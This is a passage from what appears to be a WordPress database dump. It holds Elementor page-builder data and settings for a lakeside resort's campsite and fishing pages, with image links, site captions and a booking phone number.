\"80d0abc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8acdccf\"}]},\"elements\":[{\"id\":\"d29456d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dc72064\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"42db14b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11884b1\"}]},\"elements\":[{\"id\":\"25479ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There is also a free shower house and dump station at the resort. Each site comes with a picnic table and most have fire ring. test<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2213,794,'_elementor_version','0.4'),(2214,794,'_wp_page_template','default'),(2215,794,'_elementor_template_type','post'),(2217,794,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2219,795,'_elementor_edit_mode','builder'),(2220,795,'_elementor_data','[{\"id\":\"94cd671\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4b673a4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"308656e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6f9d682\"}]},\"elements\":[{\"id\":\"58d69f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2ee48a4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6709678\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0fa9e68\"}]},\"elements\":[{\"id\":\"ebaef3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Looking for a Campsite - <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a430fa4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"fa609b1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fd18586\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a2a06f4\"}]},\"elements\":[{\"id\":\"65244c8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"20e278f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0ca8b08\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ef5ef18\"}]},\"elements\":[{\"id\":\"e3a7208\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3872.jpg\",\"id\":254},\"caption\":\"WE HAVE RV CAMPING 30 AMP SERVICE\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2e4cb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"adba769\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"b9b611f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"12f18e0\"}]},\"elements\":[{\"id\":\"469f791\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3876.jpg\",\"id\":258},\"caption\":\"THERE ARE FULL HOOK UP 30 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"896f239\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"983db86\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"44b3df9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"31b947d\"}]},\"elements\":[{\"id\":\"f9f71a7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3873.jpg\",\"id\":255},\"caption\":\"20 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc1ab0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9ff9492\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3d31bed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c5a0aac\"}]},\"elements\":[{\"id\":\"b3e37bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f0cb2f5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a81b13f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a0bfc5f\"}]},\"elements\":[{\"id\":\"f7626e5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3874.jpg\",\"id\":256}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d18f5ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5fd4daa\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"40c1597\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6cd844e\"}]},\"elements\":[{\"id\":\"7506370\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3881.jpg\",\"id\":253},\"caption\":\"TENTING NO ELECTRIC SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"027804b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dda391e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c0140ee\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ca1a73a\"}]},\"elements\":[{\"id\":\"9e619c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3879.jpg\",\"id\":252}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5323be5\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"741a9c4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"80d0abc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8acdccf\"}]},\"elements\":[{\"id\":\"d29456d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dc72064\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"42db14b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11884b1\"}]},\"elements\":[{\"id\":\"25479ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There is also a free shower house and dump station at the resort. Each site comes with a picnic table and most have fire ring.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2221,795,'_elementor_version','2.5.12'),(2222,795,'_wp_page_template','default'),(2223,795,'_elementor_template_type','post'),(2224,795,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2227,81,'_elementor_template_type','post'),(2228,81,'_elementor_version','2.6.8'),(2230,81,'vantage_panels_no_legacy','true'),(2238,81,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(2239,84,'vantage_panels_no_legacy','true'),(2240,84,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(2245,81,'_elementor_edit_mode','builder'),(2247,81,'_elementor_data','[{\"id\":\"817ef92\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c401d8f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2ff6c4b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"49298b4\"}]},\"elements\":[{\"id\":\"c96dc87\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1a80f0a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0dfcb72\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b411014\"}]},\"elements\":[{\"id\":\"49aeb2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>CATCH SOME MEMORIES<\\/strong><\\/p><p>Pelican Lake is a 4,000 acre lake with miles of interesting bays and coves to fish and explore. Pelican Lake is an excellent fishing lake for Northern, Walleye, Bass, and panfish.<\\/p><p><strong>JUST TAKE A LOOK<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ad465b\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e6fdf6e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"da0a732\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"44985af\"}]},\"elements\":[{\"id\":\"9149cb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bfdc6a5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1d42d7f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4dcd77d\"}]},\"elements\":[{\"id\":\"5c5e069\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/69361252_2574110649319471_116474079933890560_n-2.jpg\",\"id\":930}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"23a1c70\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"809c09a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9b21bea\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d145579\"}]},\"elements\":[{\"id\":\"b8e3110\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/69664187_2573526932711176_8178756056831229952_n-1.jpg\",\"id\":929}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d36d5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"55a7e23\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3c5afb7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b04fbfb\"}]},\"elements\":[{\"id\":\"f6ec988\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/69157175_2573526889377847_7240689118680711168_n-1.jpg\",\"id\":927}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c95dd54\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7c0d15d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"387c710\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a8a1ddd\"}]},\"elements\":[{\"id\":\"c2896d1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/68746823_2568210933242776_9006306614507995136_n-1.jpg\",\"id\":926}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"668445d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e5f24f9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5ab0e47\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"430173f\"}]},\"elements\":[{\"id\":\"e575265\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"6ee7655\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61be359\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"86050f1\"}]},\"elements\":[{\"id\":\"de42909\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/20160522_070826.jpg\",\"id\":371},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"df5f462\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5aa2626\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"48945bf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3f4ba65\"}]},\"elements\":[{\"id\":\"e432149\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/09\\/68430101_2559605910769945_1401026565407506432_n-1.jpg\",\"id\":925}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1cc6404\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1ad7d8d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ad470d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"86f8da6\"}]},\"elements\":[{\"id\":\"06051df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/all-kins-of-pics-009.jpg\",\"id\":340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ad64e1\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9407d0d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9681148\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4cb9f69\"}]},\"elements\":[{\"id\":\"a15b9be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2026256\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"07237f5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f6e053a\"}]},\"elements\":[{\"id\":\"bc25866\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/all-kins-of-pics-012.jpg\",\"id\":341}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f546c7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"164367c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61d1cf0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"fe02551\"}]},\"elements\":[{\"id\":\"8db9738\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/ResortPics.jpg\",\"id\":308}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d234255\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"421963b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"545c59d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3b08ea5\"}]},\"elements\":[{\"id\":\"aac74de\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Kussatz.jpg\",\"id\":298}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"997b9fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3e8b38a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bc5e9d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"47e0a38\"}]},\"elements\":[{\"id\":\"e54b73a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/06\\/DSCN2502.jpg\",\"id\":204}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c97804\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"11a63fa\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e62a9be\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8f107cf\"}]},\"elements\":[{\"id\":\"509de7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"299a10a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e4da443\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"26eb2dd\"}]},\"elements\":[{\"id\":\"6793696\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3601.jpg\",\"id\":169}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"76d42c8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2605.jpg\",\"id\":176}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f0e6f3c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"94d196a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6775c1a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c1eb986\"}]},\"elements\":[{\"id\":\"95541c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3611.jpg\",\"id\":170}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7395e62\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/62208139_2851471431591627_415800096072925184_n.jpg\",\"id\":872}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5059136\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f79900a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c62f6fe\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"03f9966\"}]},\"elements\":[{\"id\":\"b8cd8b3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/06\\/IMG_2971.jpg\",\"id\":874}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b577c8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"021ef74\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1b48237\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"315f485\"}]},\"elements\":[{\"id\":\"32dfd9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9e22c3f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a9d368f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5526c8c\"}]},\"elements\":[{\"id\":\"1a58fd3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3810.jpg\",\"id\":495}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9318e77\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c458907\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ce9fbab\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ec695bc\"}]},\"elements\":[{\"id\":\"891ac80\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3598.jpg\",\"id\":493}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ba07af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b38d892\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d2534d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"129c6ce\"}]},\"elements\":[{\"id\":\"260f883\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3565.jpg\",\"id\":490}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d643c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0b34039\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0408d03\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a474735\"}]},\"elements\":[{\"id\":\"a0b27ca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3540.jpg\",\"id\":489}},\"elements\":[],\"wi